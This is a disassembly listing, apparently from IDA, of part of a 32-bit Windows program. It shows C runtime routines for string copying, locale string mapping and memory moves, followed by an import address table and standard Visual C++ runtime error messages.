arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov ecx, [esp+arg_8]
push edi
test ecx, ecx
jz short loc_404683
push esi
push ebx
mov ebx, ecx
mov esi, [esp+0Ch+arg_4]
test esi, 3
mov edi, [esp+0Ch+arg_0]
jnz short loc_404624
shr ecx, 2
jnz short loc_404691
jmp short loc_404645
; ---------------------------------------------------------------------------
loc_404624: ; CODE XREF: sub_404600+1B�j
; sub_404600+37�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
dec ecx
jz short loc_404652
test al, al
jz short loc_40465A
test esi, 3
jnz short loc_404624
mov ebx, ecx
shr ecx, 2
jnz short loc_404691
loc_404640: ; CODE XREF: sub_404600+8F�j
and ebx, 3
jz short loc_404652
loc_404645: ; CODE XREF: sub_404600+22�j
; sub_404600+50�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
test al, al
jz short loc_40467E
dec ebx
jnz short loc_404645
loc_404652: ; CODE XREF: sub_404600+2B�j
; sub_404600+43�j
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_40465A: ; CODE XREF: sub_404600+2F�j
test edi, 3
jz short loc_404674
loc_404662: ; CODE XREF: sub_404600+72�j
mov [edi], al
inc edi
dec ecx
jz loc_4046F6
test edi, 3
jnz short loc_404662
loc_404674: ; CODE XREF: sub_404600+60�j
mov ebx, ecx
shr ecx, 2
jnz short loc_4046E7
loc_40467B: ; CODE XREF: sub_404600+7F�j
; sub_404600+F4�j
mov [edi], al
inc edi
loc_40467E: ; CODE XREF: sub_404600+4D�j
dec ebx
jnz short loc_40467B
pop ebx
pop esi
loc_404683: ; CODE XREF: sub_404600+7�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_404689: ; CODE XREF: sub_404600+A9�j
; sub_404600+C1�j
mov [edi], edx
add edi, 4
dec ecx
jz short loc_404640
loc_404691: ; CODE XREF: sub_404600+20�j
; sub_404600+3E�j
mov edx, 7EFEFEFFh
mov eax, [esi]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [esi]
add esi, 4
test eax, 81010100h
jz short loc_404689
test dl, dl
jz short loc_4046DB
test dh, dh
jz short loc_4046D1
test edx, 0FF0000h
jz short loc_4046C7
test edx, 0FF000000h
jnz short loc_404689
mov [edi], edx
jmp short loc_4046DF
; ---------------------------------------------------------------------------
loc_4046C7: ; CODE XREF: sub_404600+B9�j
and edx, 0FFFFh
mov [edi], edx
jmp short loc_4046DF
; ---------------------------------------------------------------------------
loc_4046D1: ; CODE XREF: sub_404600+B1�j
and edx, 0FFh
mov [edi], edx
jmp short loc_4046DF
; ---------------------------------------------------------------------------
loc_4046DB: ; CODE XREF: sub_404600+AD�j
xor edx, edx
mov [edi], edx
loc_4046DF: ; CODE XREF: sub_404600+C5�j
; sub_404600+CF�j ...
add edi, 4
xor eax, eax
dec ecx
jz short loc_4046F1
loc_4046E7: ; CODE XREF: sub_404600+79�j
xor eax, eax
loc_4046E9: ; CODE XREF: sub_404600+EF�j
mov [edi], eax
add edi, 4
dec ecx
jnz short loc_4046E9
loc_4046F1: ; CODE XREF: sub_404600+E5�j
and ebx, 3
jnz short loc_40467B
loc_4046F6: ; CODE XREF: sub_404600+66�j
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
sub_404600 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4046FE proc near ; CODE XREF: sub_403AE6+BE�p
; sub_403AE6+E6�p
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_405470
push offset sub_4034B8
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 1Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
xor edi, edi
cmp ds:dword_4070DC, edi
jnz short loc_404774
push edi
push edi
push 1
pop ebx
push ebx
push offset dword_405424
mov esi, 100h
push esi
push edi
call ds:dword_405098 ; LCMapStringW
test eax, eax
jz short loc_404752
mov ds:dword_4070DC, ebx
jmp short loc_404774
; ---------------------------------------------------------------------------
loc_404752: ; CODE XREF: sub_4046FE+4A�j
push edi
push edi
push ebx
push offset dword_406F38
push esi
push edi
call ds:dword_40509C ; LCMapStringA
test eax, eax
jz loc_40488C
mov ds:dword_4070DC, 2
loc_404774: ; CODE XREF: sub_4046FE+2E�j
; sub_4046FE+52�j
cmp [ebp+arg_C], edi
jle short loc_404789
push [ebp+arg_C]
push [ebp+arg_8]
call sub_404922
pop ecx
pop ecx
mov [ebp+arg_C], eax
loc_404789: ; CODE XREF: sub_4046FE+79�j
mov eax, ds:dword_4070DC
cmp eax, 2
jnz short loc_4047B0
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_40509C ; LCMapStringA
jmp loc_40488E
; ---------------------------------------------------------------------------
loc_4047B0: ; CODE XREF: sub_4046FE+93�j
cmp eax, 1
jnz loc_40488C
cmp [ebp+arg_18], edi
jnz short loc_4047C6
mov eax, ds:dword_4070D4
mov [ebp+arg_18], eax
loc_4047C6: ; CODE XREF: sub_4046FE+BE�j
push edi
push edi
push [ebp+arg_C]
push [ebp+arg_8]
mov eax, [ebp+arg_1C]
neg eax
sbb eax, eax
and eax, 8
inc eax
push eax
push [ebp+arg_18]
call ds:dword_405078 ; MultiByteToWideChar
mov ebx, eax
mov [ebp+var_1C], ebx
cmp ebx, edi
jz loc_40488C
mov [ebp+var_4], edi
lea eax, [ebx+ebx]
add eax, 3
and al, 0FCh
call sub_4025D0
mov [ebp+var_18], esp
mov eax, esp
mov [ebp+var_24], eax
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_404821
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor edi, edi
mov [ebp+var_24], edi
or [ebp+var_4], 0FFFFFFFFh
mov ebx, [ebp+var_1C]
loc_404821: ; CODE XREF: sub_4046FE+10E�j
cmp [ebp+var_24], edi
jz short loc_40488C
push ebx
push [ebp+var_24]
push [ebp+arg_C]
push [ebp+arg_8]
push 1
push [ebp+arg_18]
call ds:dword_405078 ; MultiByteToWideChar
test eax, eax
jz short loc_40488C
push edi
push edi
push ebx
push [ebp+var_24]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_405098 ; LCMapStringW
mov esi, eax
mov [ebp+var_28], esi
cmp esi, edi
jz short loc_40488C
test byte ptr [ebp+arg_4+1], 4
jz short loc_4048A0
cmp [ebp+arg_14], edi
jz loc_40491B
cmp esi, [ebp+arg_14]
jg short loc_40488C
push [ebp+arg_14]
push [ebp+arg_10]
push ebx
push [ebp+var_24]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_405098 ; LCMapStringW
test eax, eax
jnz loc_40491B
loc_40488C: ; CODE XREF: sub_4046FE+66�j
; sub_4046FE+B5�j ...
xor eax, eax
loc_40488E: ; CODE XREF: sub_4046FE+AD�j
; sub_4046FE+21F�j
lea esp, [ebp-38h]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_4048A0: ; CODE XREF: sub_4046FE+160�j
mov [ebp+var_4], 1
lea eax, [esi+esi]
add eax, 3
and al, 0FCh
call sub_4025D0
mov [ebp+var_18], esp
mov ebx, esp
mov [ebp+var_20], ebx
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_4048D4
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor edi, edi
xor ebx, ebx
or [ebp+var_4], 0FFFFFFFFh
mov esi, [ebp+var_28]
loc_4048D4: ; CODE XREF: sub_4046FE+1C2�j
cmp ebx, edi
jz short loc_40488C
push esi
push ebx
push [ebp+var_1C]
push [ebp+var_24]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_405098 ; LCMapStringW
test eax, eax
jz short loc_40488C
cmp [ebp+arg_14], edi
push edi
push edi
jnz short loc_4048FB
push edi
push edi
jmp short loc_404901
; ---------------------------------------------------------------------------
loc_4048FB: ; CODE XREF: sub_4046FE+1F7�j
push [ebp+arg_14]
push [ebp+arg_10]
loc_404901: ; CODE XREF: sub_4046FE+1FB�j
push esi
push ebx
push 220h
push [ebp+arg_18]
call ds:dword_4050C8 ; WideCharToMultiByte
mov esi, eax
cmp esi, edi
jz loc_40488C
loc_40491B: ; CODE XREF: sub_4046FE+165�j
; sub_4046FE+188�j
mov eax, esi
jmp loc_40488E
sub_4046FE endp
; =============== S U B R O U T I N E =======================================
sub_404922 proc near ; CODE XREF: sub_4046FE+81�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_4]
mov eax, [esp+arg_0]
test edx, edx
push esi
lea ecx, [edx-1]
jz short loc_40493F
loc_404932: ; CODE XREF: sub_404922+1B�j
cmp byte ptr [eax], 0
jz short loc_40493F
inc eax
mov esi, ecx
dec ecx
test esi, esi
jnz short loc_404932
loc_40493F: ; CODE XREF: sub_404922+E�j
; sub_404922+13�j
cmp byte ptr [eax], 0
pop esi
jnz short loc_40494A
sub eax, [esp+arg_0]
retn
; ---------------------------------------------------------------------------
loc_40494A: ; CODE XREF: sub_404922+21�j
mov eax, edx
retn
sub_404922 endp
; =============== S U B R O U T I N E =======================================
sub_40494D proc near ; CODE XREF: sub_403CC8+1F�p
arg_0 = dword ptr 4
mov eax, ds:dword_4070E4
test eax, eax
jz short loc_404965
push [esp+arg_0]
call eax
test eax, eax
pop ecx
jz short loc_404965
push 1
pop eax
retn
; ---------------------------------------------------------------------------
loc_404965: ; CODE XREF: sub_40494D+7�j
; sub_40494D+12�j
xor eax, eax
retn
sub_40494D endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404970 proc near ; CODE XREF: sub_403D93+2EE�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
mov esi, [ebp+arg_4]
mov ecx, [ebp+arg_8]
mov edi, [ebp+arg_0]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe short loc_404990
cmp edi, eax
jb loc_404B08
loc_404990: ; CODE XREF: sub_404970+16�j
test edi, 3
jnz short loc_4049AC
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_4049CC
rep movsd
jmp ds:off_404AB8[edx*4]
; ---------------------------------------------------------------------------
loc_4049AC: ; CODE XREF: sub_404970+26�j
mov eax, edi
mov edx, 3
sub ecx, 4
jb short loc_4049C4
and eax, 3
add ecx, eax
jmp dword ptr ds:loc_4049CC+4[eax*4]
; ---------------------------------------------------------------------------
loc_4049C4: ; CODE XREF: sub_404970+46�j
jmp dword ptr ds:loc_404AC8[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_4049CC: ; CODE XREF: sub_404970+31�j
; sub_404970+8E�j ...
jmp ds:off_404A4C[ecx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_4049E0
dd offset loc_404A0C
dd offset loc_404A30
; ---------------------------------------------------------------------------
loc_4049E0: ; DATA XREF: sub_404970+64�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
add esi, 3
add edi, 3
cmp ecx, 8
jb short loc_4049CC
rep movsd
jmp ds:off_404AB8[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_404A0C: ; DATA XREF: sub_404970+68�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
add esi, 2
add edi, 2
cmp ecx, 8
jb short loc_4049CC
rep movsd
jmp ds:off_404AB8[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_404A30: ; DATA XREF: sub_404970+6C�o
and edx, ecx
mov al, [esi]
mov [edi], al
inc esi
shr ecx, 2
inc edi
cmp ecx, 8
jb short loc_4049CC
rep movsd
jmp ds:off_404AB8[edx*4]
; ---------------------------------------------------------------------------
align 4
off_404A4C dd offset loc_404AAF ; DATA XREF: sub_404970:loc_4049CC�r
dd offset loc_404A9C
dd offset loc_404A94
dd offset loc_404A8C
dd offset loc_404A84
dd offset loc_404A7C
dd offset loc_404A74
dd offset loc_404A6C
; ---------------------------------------------------------------------------
loc_404A6C: ; CODE XREF: sub_404970:loc_4049CC�j
; DATA XREF: sub_404970+F8�o
mov eax, [esi+ecx*4-1Ch]
mov [edi+ecx*4-1Ch], eax
loc_404A74: ; CODE XREF: sub_404970:loc_4049CC�j
; DATA XREF: sub_404970+F4�o
mov eax, [esi+ecx*4-18h]
mov [edi+ecx*4-18h], eax
loc_404A7C: ; CODE XREF: sub_404970:loc_4049CC�j
; DATA XREF: sub_404970+F0�o
mov eax, [esi+ecx*4-14h]
mov [edi+ecx*4-14h], eax
loc_404A84: ; CODE XREF: sub_404970:loc_4049CC�j
; DATA XREF: sub_404970+EC�o
mov eax, [esi+ecx*4-10h]
mov [edi+ecx*4-10h], eax
loc_404A8C: ; CODE XREF: sub_404970:loc_4049CC�j
; DATA XREF: sub_404970+E8�o
mov eax, [esi+ecx*4-0Ch]
mov [edi+ecx*4-0Ch], eax
loc_404A94: ; CODE XREF: sub_404970:loc_4049CC�j
; DATA XREF: sub_404970+E4�o
mov eax, [esi+ecx*4-8]
mov [edi+ecx*4-8], eax
loc_404A9C: ; CODE XREF: sub_404970:loc_4049CC�j
; DATA XREF: sub_404970+E0�o
mov eax, [esi+ecx*4-4]
mov [edi+ecx*4-4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_404AAF: ; CODE XREF: sub_404970:loc_4049CC�j
; DATA XREF: sub_404970:off_404A4C�o
jmp ds:off_404AB8[edx*4]
; ---------------------------------------------------------------------------
align 4
off_404AB8 dd offset loc_404AC8 ; DATA XREF: sub_404970+35�r
; sub_404970+92�r ...
dd offset loc_404AD0
dd offset loc_404ADC
dd offset loc_404AF0
; ---------------------------------------------------------------------------
loc_404AC8: ; CODE XREF: sub_404970+35�j
; sub_404970+92�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_404AD0: ; CODE XREF: sub_404970+35�j
; sub_404970+92�j ...
mov al, [esi]
mov [edi], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_404ADC: ; CODE XREF: sub_404970+35�j
; sub_404970+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_404AF0: ; CODE XREF: sub_404970+35�j
; sub_404970+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_404B08: ; CODE XREF: sub_404970+1A�j
lea esi, [ecx+esi-4]
lea edi, [ecx+edi-4]
test edi, 3
jnz short loc_404B3C
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_404B30
std
rep movsd
cld
jmp ds:off_404C50[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_404B30: ; CODE XREF: sub_404970+1B1�j
; sub_404970+208�j ...
neg ecx
jmp ds:off_404C00[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_404B3C: ; CODE XREF: sub_404970+1A6�j
mov eax, edi
mov edx, 3
cmp ecx, 4
jb short loc_404B54
and eax, 3
sub ecx, eax
jmp dword ptr ds:loc_404B54+4[eax*4]
; ---------------------------------------------------------------------------
loc_404B54: ; CODE XREF: sub_404970+1D6�j
; DATA XREF: sub_404970+1DD�r
jmp ds:off_404C50[ecx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_404B67+1
dd offset loc_404B88
; ---------------------------------------------------------------------------
mov al, 4Bh
inc eax
loc_404B67: ; DATA XREF: sub_404970+1EC�o
add [edx-2EDCFCBAh], cl
mov [edi+3], al
dec esi
shr ecx, 2
dec edi
cmp ecx, 8
jb short loc_404B30
std
rep movsd
cld
jmp ds:off_404C50[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_404B88: ; DATA XREF: sub_404970+1F0�o
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
sub esi, 2
sub edi, 2
cmp ecx, 8
jb short loc_404B30
std
rep movsd
cld
jmp ds:off_404C50[edx*4]
; ---------------------------------------------------------------------------
align 10h
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
sub esi, 3
sub edi, 3
cmp ecx, 8
jb loc_404B30
std
rep movsd
cld
jmp ds:off_404C50[edx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_404C04
dd offset loc_404C0C
dd offset loc_404C14
dd offset loc_404C1C
dd offset loc_404C24
dd offset loc_404C2C
dd offset loc_404C34
off_404C00 dd offset loc_404C47 ; DATA XREF: sub_404970+1C2�r
; ---------------------------------------------------------------------------
loc_404C04: ; DATA XREF: sub_404970+274�o
mov eax, [esi+ecx*4+1Ch]
mov [edi+ecx*4+1Ch], eax
loc_404C0C: ; DATA XREF: sub_404970+278�o
mov eax, [esi+ecx*4+18h]
mov [edi+ecx*4+18h], eax
loc_404C14: ; DATA XREF: sub_404970+27C�o
mov eax, [esi+ecx*4+14h]
mov [edi+ecx*4+14h], eax
loc_404C1C: ; DATA XREF: sub_404970+280�o
mov eax, [esi+ecx*4+10h]
mov [edi+ecx*4+10h], eax
loc_404C24: ; DATA XREF: sub_404970+284�o
mov eax, [esi+ecx*4+0Ch]
mov [edi+ecx*4+0Ch], eax
loc_404C2C: ; DATA XREF: sub_404970+288�o
mov eax, [esi+ecx*4+8]
mov [edi+ecx*4+8], eax
loc_404C34: ; DATA XREF: sub_404970+28C�o
mov eax, [esi+ecx*4+4]
mov [edi+ecx*4+4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_404C47: ; CODE XREF: sub_404970+1C2�j
; DATA XREF: sub_404970:off_404C00�o
jmp ds:off_404C50[edx*4]
; ---------------------------------------------------------------------------
align 10h
off_404C50 dd offset loc_404C60 ; DATA XREF: sub_404970+1B7�r
; sub_404970:loc_404B54�r ...
dd offset loc_404C68
dd offset loc_404C78
dd offset loc_404C8C
; ---------------------------------------------------------------------------
loc_404C60: ; CODE XREF: sub_404970+1B7�j
; sub_404970:loc_404B54�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_404C68: ; CODE XREF: sub_404970+1B7�j
; sub_404970:loc_404B54�j ...
mov al, [esi+3]
mov [edi+3], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_404C78: ; CODE XREF: sub_404970+1B7�j
; sub_404970:loc_404B54�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_404C8C: ; CODE XREF: sub_404970+1B7�j
; sub_404970:loc_404B54�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
sub_404970 endp
; ---------------------------------------------------------------------------
align 2
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_404CA6 proc near ; CODE XREF: sub_4033C0+13�p
jmp ds:dword_405080
sub_404CA6 endp
; ---------------------------------------------------------------------------
dd 0D5h dup(0)
dword_405000 dd 77E2A571h ; DATA XREF: sub_402029+9B�r
dword_405004 dd 77DD5ECCh ; DATA XREF: sub_4020D7+96�r
dword_405008 dd 77DD59F0h ; DATA XREF: sub_4020D7+BE�r
dword_40500C dd 77DD189Ah ; DATA XREF: sub_4020D7+C7�r
dd 0
dword_405014 dd 77E805D8h ; DATA XREF: sub_404573+12�r
dword_405018 dd 77E73167h ; DATA XREF: sub_4010D2+76�r
; sub_40127D+8F�r ...
dword_40501C dd 77E6E32Eh ; DATA XREF: sub_401210+63�r
; sub_401B08+2AB�r
dword_405020 dd 77E6D09Bh ; DATA XREF: sub_401210+43�r
dword_405024 dd 77E6D071h ; DATA XREF: sub_401210+2C�r
dword_405028 dd 77E61BE6h ; DATA XREF: sub_40127D+105�r
; sub_40159E+4D0�r ...
dword_40502C dd 77E6E4C8h ; DATA XREF: sub_401B08+275�r
dword_405030 dd 77E99331h ; DATA XREF: sub_401B08+259�r
dword_405034 dd 77E7A099h ; DATA XREF: sub_401B08+24A�r
; sub_401EF0+F8�r ...
dword_405038 dd 77E7AC37h ; DATA XREF: sub_401E65+7B�r
; sub_402029:loc_402095�r
dword_40503C dd 77E684C6h ; DATA XREF: sub_401EF0+126�r
dword_405040 dd 77F5157Dh ; DATA XREF: sub_402029+5B�r
dword_405044 dd 77E7751Ah ; DATA XREF: sub_402029+18�r
dword_405048 dd 77E7C2C4h ; DATA XREF: sub_402029+7�r
dword_40504C dd 77E6BD13h ; DATA XREF: sub_4020D7+82�r
dword_405050 dd 77E705B0h ; DATA XREF: sub_4020D7+27�r
dword_405054 dd 77E7A5FDh ; DATA XREF: sub_404573+1E�r
dword_405058 dd 77F5722Fh ; DATA XREF: sub_4043C7+28�r
dword_40505C dd 77E7980Ah ; DATA XREF: sub_4043C7+76�r
; sub_404478+51�r
dword_405060 dd 77F516F8h ; DATA XREF: sub_403CF4+2E�r
; sub_403D2A+D�r ...
dword_405064 dd 77E6C703h ; DATA XREF: sub_403A40+1A�r
dword_405068 dd 77E7A13Fh ; DATA XREF: sub_403A40+2F�r
dword_40506C dd 77E7849Fh ; DATA XREF: sub_4038A7+48�r
; sub_403AE6+14�r
dword_405070 dd 77E7C866h ; DATA XREF: sub_40371C+3F�r
; sub_40371C+12D�r
dword_405074 dd 77E641EBh ; DATA XREF: sub_40371C+59�r
; sub_40371C+8D�r
dword_405078 dd 77E77CCEh ; DATA XREF: sub_40371C+C5�r
; sub_40371C+11B�r ...
dword_40507C dd 77E79D8Ch ; DATA XREF: sub_4035C9+14A�r
dword_405080 dd 77F6183Eh ; DATA XREF: sub_404CA6�r
dword_405084 dd 77F51597h ; DATA XREF: sub_403C87+27�r
; sub_403D93+2C4�r ...
dword_405088 dd 77E79E34h ; DATA XREF: sub_403D93+23F�r
dword_40508C dd 77E7C726h ; DATA XREF: sub_403382+11�r
dword_405090 dd 77E76E0Bh ; DATA XREF: sub_403382+2F�r
dword_405094 dd 77E78406h ; DATA XREF: sub_4031D7+FF�r
; sub_4031D7+166�r
dword_405098 dd 77E781F9h ; DATA XREF: sub_4046FE+42�r
; sub_4046FE+14D�r ...
dword_40509C dd 77E77405h ; DATA XREF: sub_4046FE+5E�r
; sub_4046FE+A7�r
dword_4050A0 dd 77E79F93h ; DATA XREF: sub_40283E+C2�r
dword_4050A4 dd 77E6177Ah ; DATA XREF: sub_40283E+9F�r
; sub_4031D7+59�r
dword_4050A8 dd 77E7C938h ; DATA XREF: sub_40283E+74�r
dword_4050AC dd 77E7C486h ; DATA XREF: sub_40283E+26�r
dword_4050B0 dd 77E75CB5h ; DATA XREF: sub_402959+1D�r
; sub_402B10+91�r
dword_4050B4 dd 77E616B4h ; DATA XREF: sub_402B10+17�r
dword_4050B8 dd 77E79C90h ; DATA XREF: sub_402B10+10�r
dword_4050BC dd 77EB9A84h ; DATA XREF: sub_402BC3+138�r
dword_4050C0 dd 77E9C5B1h ; DATA XREF: sub_4030A5+11F�r
dword_4050C4 dd 77E7C9E1h ; DATA XREF: sub_4030A5+CE�r
dword_4050C8 dd 77E79924h ; DATA XREF: sub_4030A5+7E�r
; sub_4046FE+20D�r
dword_4050CC dd 77E67702h ; DATA XREF: sub_4030A5:loc_4030D4�r
; sub_4030A5+E1�r
dword_4050D0 dd 77E77EE1h ; DATA XREF: sub_4030A5+9�r
dword_4050D4 dd 77E7C931h ; DATA XREF: sub_4031D7+19D�r
dword_4050D8 dd 77E79C3Dh ; DATA XREF: sub_4031D7+158�r
; sub_4035C9+143�r
align 10h
dword_4050E0 dd 77D4C96Ah ; DATA XREF: sub_401210+1C�r
; sub_40127D+B7�r ...
align 8
dword_4050E8 dd 71AB868Dh ; DATA XREF: sub_401E65+68�r
dword_4050EC dd 71AB5690h ; DATA XREF: sub_401398+179�r
; sub_40159E+2DD�r ...
dword_4050F0 dd 71AB1AF4h ; DATA XREF: sub_40127D+DE�r
; sub_401398+151�r ...
dword_4050F4 dd 71AB1746h ; DATA XREF: sub_401153+23�r
; sub_40127D+27�r ...
dword_4050F8 dd 71AB3C22h ; DATA XREF: sub_401153+50�r
; sub_40127D+51�r ...
dword_4050FC dd 71AB3E5Dh ; DATA XREF: sub_401153+68�r
; sub_40127D+6C�r ...
dword_405100 dd 71AB5DE2h ; DATA XREF: sub_401E65+51�r
dword_405104 dd 71AB32CAh ; DATA XREF: sub_4010D2+18�r
dword_405108 dd 71AB401Ch ; DATA XREF: sub_4010D2+43�r
dword_40510C dd 71AB12F8h ; DATA XREF: sub_401045+8�r
; sub_4011D5+7�r ...
dword_405110 dd 71AB2BBFh ; DATA XREF: sub_4010D2+29�r
; sub_4011D5+1E�r ...
dword_405114 dd 71AB41DAh ; DATA XREF: sub_401028+10�r
dword_405118 dd 71AB3ECEh ; DATA XREF: sub_401E65+43�r
dword_40511C dd 71AB1A6Dh ; DATA XREF: sub_401153+76�r
; sub_40127D+10F�r ...
dd 2 dup(0)
dword_405128 dd 0FFFFFFFFh, 402915h, 402929h, 746E7572h, 20656D69h
; DATA XREF: sub_40283E+5�o
dd 6F727265h, 2072h, 0A0Dh, 534F4C54h, 72652053h, 0D726F72h
dd 0Ah, 474E4953h, 72726520h, 0A0D726Fh, 0
dd 414D4F44h, 65204E49h, 726F7272h, 0A0Dh, 32303652h, 2D0A0D38h
dd 616E7520h, 20656C62h, 69206F74h, 6974696Eh, 7A696C61h
dd 65682065h, 0A0D7061h, 0
aR6027NotEnough db 'R6027',0Dh,0Ah
db '- not enough space for lowio initialization',0Dh,0Ah,0
align 4
aR6026NotEnough db 'R6026',0Dh,0Ah
db '- not enough space for stdio initialization',0Dh,0Ah,0
align 10h
aR6025PureVirtu db 'R6025',0Dh,0Ah
db '- pure virtual function call',0Dh,0Ah,0
align 4
aR6024NotEnough db 'R6024',0Dh,0Ah
db '- not enough space for _onexit/atexit table',0Dh,0Ah,0
align 10h
aR6019UnableToO db 'R6019',0Dh,0Ah
db '- unable to open console device',0Dh,0Ah,0
align 4
aR6018Unexpecte db 'R6018',0Dh,0Ah
db '- unexpected heap error',0Dh,0Ah,0
align 10h
aR6017Unexpecte db 'R6017',0Dh,0Ah
db '- unexpected multithread lock error',0Dh,0Ah,0
align 10h
aR6016NotEnough db 'R6016',0Dh,0Ah
db '- not enough space for thread data',0Dh,0Ah,0
aAbnormalProgra db 0Dh,0Ah
db 'abnormal program termination',0Dh,0Ah,0
align 10h
aR6009NotEnough db 'R6009',0Dh,0Ah
db '- not enough space for environment',0Dh,0Ah,0
aR6008NotEnough db 'R6008',0Dh,0Ah
db '- not enough space for arguments',0Dh,0Ah,0
align 4
aR6002FloatingP db 'R6002',0Dh,0Ah ; DATA XREF: .text:off_406DA4�o
db '- floating point not loaded',0Dh,0Ah,0
align 10h
aMicrosoftVisua db 'Microsoft Visual C++ Runtime Library',0 ; DATA XREF: sub_4035C9+119�o
align 4
asc_4053E8 db 0Ah ; DATA XREF: sub_4035C9+F1�o
db 0Ah,0
align 4
aRuntimeErrorPr db 'Runtime Error!',0Ah ; DATA XREF: sub_4035C9+D3�o
db 0Ah
db 'Program: ',0
align 4
a___ db '...',0 ; DATA XREF: sub_4035C9+BF�o
aProgramNameUnk db '<program name unknown>',0 ; DATA XREF: sub_4035C9+7D�o
align 4
dword_405424 dd 0 ; DATA XREF: sub_40371C+39�o
; sub_4046FE+36�o
dword_405428 dd 0FFFFFFFFh, 403815h, 403819h ; DATA XREF: sub_40371C+5�o
aGetlastactivep db 'GetLastActivePopup',0 ; DATA XREF: sub_404573+3D�o
align 4
aGetactivewindo db 'GetActiveWindow',0 ; DATA XREF: sub_404573+35�o
aMessageboxa db 'MessageBoxA',0 ; DATA XREF: sub_404573+24�o
aUser32_dll db 'user32.dll',0 ; DATA XREF: sub_404573+D�o
align 10h
dword_405470 dd 0FFFFFFFFh, 40480Eh, 404812h, 0FFFFFFFFh, 4048C2h, 4048C6h
; DATA XREF: sub_4046FE+5�o
dd 55CCh, 2 dup(0)
dd 561Ch, 50E0h, 5500h, 2 dup(0)
dd 5714h, 5014h, 55D4h, 2 dup(0)
dd 5722h, 50E8h, 54ECh, 2 dup(0)
dd 5774h, 5000h, 5 dup(0)
dd 77E2A571h, 77DD5ECCh, 77DD59F0h, 77DD189Ah, 0
dd 77E805D8h, 77E73167h, 77E6E32Eh, 77E6D09Bh, 77E6D071h
